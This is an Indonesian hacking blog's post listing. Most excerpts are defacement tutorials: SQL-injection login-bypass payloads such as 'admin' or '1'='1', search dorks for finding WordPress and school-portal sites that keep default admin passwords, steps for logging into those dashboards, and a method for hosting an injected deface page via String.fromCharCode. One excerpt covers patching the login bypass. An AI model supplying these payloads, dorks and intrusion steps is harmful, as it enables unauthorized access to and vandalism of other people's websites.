Postingan

Tutorial Deface Bypass Admin Login dan Cara Patch Bug Bypass Admin

Gambar
Hallo, Bro Apa kabar? Bypass Admin Login~ Sebenarnya ini tidak jauh berbeda dan masih berhubungan dengan SQL Injection. Jika kita ketahui, bug ini memungkinkan seorang attacker untuk masuk sebagai admin hanya dengan memasukan username dan password contoh seperti or 1=1 tanpa harus repot-repot seperti halnya melakukan ekploitasi website. Pengertianya cukup itu saja. Oiya buat yang masih belum mengerti atau pengen tahu yang lebih jelas, kenapa ini bisa terjadi? Lalu dimana letak kesalahan tersebut? Oke, saya sudah menyiapkan artikel sebagai referensi untuk bisa kamu baca mengenai hal ini, berikut linknya: Baca: Sekilas tentang SQLi Pada Form Login Payload Bypass Admin Dari sekian banyak query yang bertebaran di internet, disini saya akan membagikan beberapa query yang sering saya gunakan untuk bypass admin login website, diantaranya sebagai berikut: admin' # admin' or '1'='1 admin' or '1'='1'# admin' or 1=1 or ''=' 'or 1=1 limit...

Deface Poc Wp Default U/P

Gambar
  Assalamualaikum warahmatullahi wabarokhatu Hello sobat Semua nya Balik Lagi di Blog INDONESIA CYBER XPLOID gimana kabar nya? sehat ya Alhamdulillah Nah di kesempatan kali ini Sama Gua AnggaXploit Mau kasih tutorial dikit"tapi jadi bukit asekk:) Ok gua bakal kasih tutorial Deface Poc Wp Default U/P Langsung aja ya kita siapain dulu bahan"nya Dork: intitle:"Hello World " intext: inurl:/wp/ intitle:"Wordpress" site:. intitle:"my blog my wordpress blog" site:. Kembangin lagi biar dapet yang vuln:) Exploit: wp-login.php Hp/PC Internet  U/P admin Pass admin  admin Step by Step Kalian ngedork dulu setelah temu website nya kalian tempel aja Exploit nya  Contoh: Site.com/wp-login.php  Contoh gambar seperti di bawah ini sob  Nah jika udah kaya gitu kalian masukin aja user sama pass nya U:admin P:pass Jika gak bisa coba U:admin P:admin Kalo gak bisa juga berarti gak vuln ya cari yang lain,cuman kalo bisa langsung Redict ke dashboard admin nya contoh nya s...

Deface Poc Candy SKL

Gambar
  Assalamualaikum warahmatullahi wabarokhatuh hello kawan-kawan semua nya  Di tutorial kali ini dengan saya AnggaXploit,nah Disni saya mau bahas tutorial Deface Poc Candy SKL default U/P Next siapain dulu bahan"nya Dork intitle:"SKL" + "SUDAH DIBUKA" Masih banyak yang vuln Exploits /admin User/Pass admin/1234 Ok step by step seperti biasa kalian ngedork terlebih dahulu sampai temu target,jika sudah ada target langsung saja kasih exploit nya ya  Contoh Site.com/admin Seperti itu ya kalo sudah di kasih exploit bakal masuk ke tabel login kira"seperti gambar di bawah ini  Nah di bagian User dan pass nya kalian isi langsung aja,user admin pass 1234  Jika berhasil maka akan masuk ke dashboard admin kira"seperti gambar di bawah ini  Jika seperti ini berati berhasil ya sob,kalian bebas mau ngapain aja kalo sudah ada di dashboard nya,ok segitu aja tutorial dari gua tentang deface poc Candy SKL default U/P Semoga bermanfaat see you in the next content :) Hasil ...

Cara Record Script Defece HTML Orang Jadi Script Sendiri:v

Gambar
                             Assalamualaikum  Saya Mau Kasih Tutor Buat Kalian  Tutorial Cara Record Script Defece HTML Orang Jadi Milik Kita Sendiri:v  Bahan= 1.MT Manager 2.Defece HTML orang 3.Wifi/Data 4.Cwe Kalo Punya:v Contoh Sc Defece  <html> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <meta name="viewport" content="width=device-width, initial-scale=1" />  <head>  <title>"ঔৣMR.CyberHack࿐"</title> <meta property="og:description" content="Karetan Cyber Team"/>  <meta property="og:image" content="https://i.top4top.io/p_1695lgtoh0.jpeg"/> <link rel="shortcut icon" href="https://f.top4top.io/p_1691sugh50.jpeg"/> <link href="https://fonts.googleapis.com/css?family=&display=swap...

CARA PATCH BUG BYPASS ADMIN LOGIN

Gambar
                          Cara Patch Bug Bypass Admin Login ByAnggaXploit Kali Ini gw ingin share sedikit materi tentang cara Patch bug bypass admin login langsung aja ke tutorial nya <?php $message = “”; if(isset($_POST[‘submit’])) { $username = ($_POST[‘username’]); $password = ($_POST[‘password’]); kode bla bla bla kode bla bla bla kode bla bla bla } else { $message = “Username and Password is not matched”; } } ?>   Jika kita pahami pada source kode diatas, berikut ini adalah kode dimana yang menjadi masalah yaitu bisa di bypass admin login nya.   $username = ($_POST[‘username’]); $password = ($_POST[‘password’]);   Penjelasan begini, kita tahu bahwa kode tersebut tidak ada filterisasi karakter yang mengakibatkan adanya bug dimana seorang attacker bisa dapat memasukan query injeksi dan dapat masuk ke dashboard panel admin suatu website. Nah, maka dari itu kita tambahkan saja kode atau fungsi mysqli_...

Cara membuat Script JSO By AnggaXploit

Gambar
 Asalamuallaikum Wr.wb. ya kali ini gua akan membahas cara membuat Script JSO by AnggaXploit Ya langsung Saja ea,simak tutornya!! 1.Pertama kalian buka Creator Script Jsonya https://bit.ly/3JC1LxL klo udah masuk ke web nya lu copy script deface kalian dan pastekan di bagian atas seperti gambar di bawah ini : Klo udah di pastekan seperti di atas selanjutnya kalian pencet convert. 2.Selanjutnya kalian salin angka² yang seperti di bawah ini : Klo udah kalian salin seanjutnya kita masuk ke paste bin, nih gua kash link nya eaa :v http://pastebin.com/ 3.Lalu pastekan angka² yang tadi kalian salin ke pastenin di bagian new paste. Contoh: Note: Jangn lupa kalian tambhkan kurung buka dan kurung tutup nya eaa, dan kalian jangan lupa menambahkan kode seperti di gambar, nih gua sediain biar lu tinggal salin enakann lu :v Code: document.documentElement.innerHTML=String.fromCharCode 4. Klo udah kalian pencet create new paste  5. Kalo kalian udah create new paste selanjut nya kalian raw...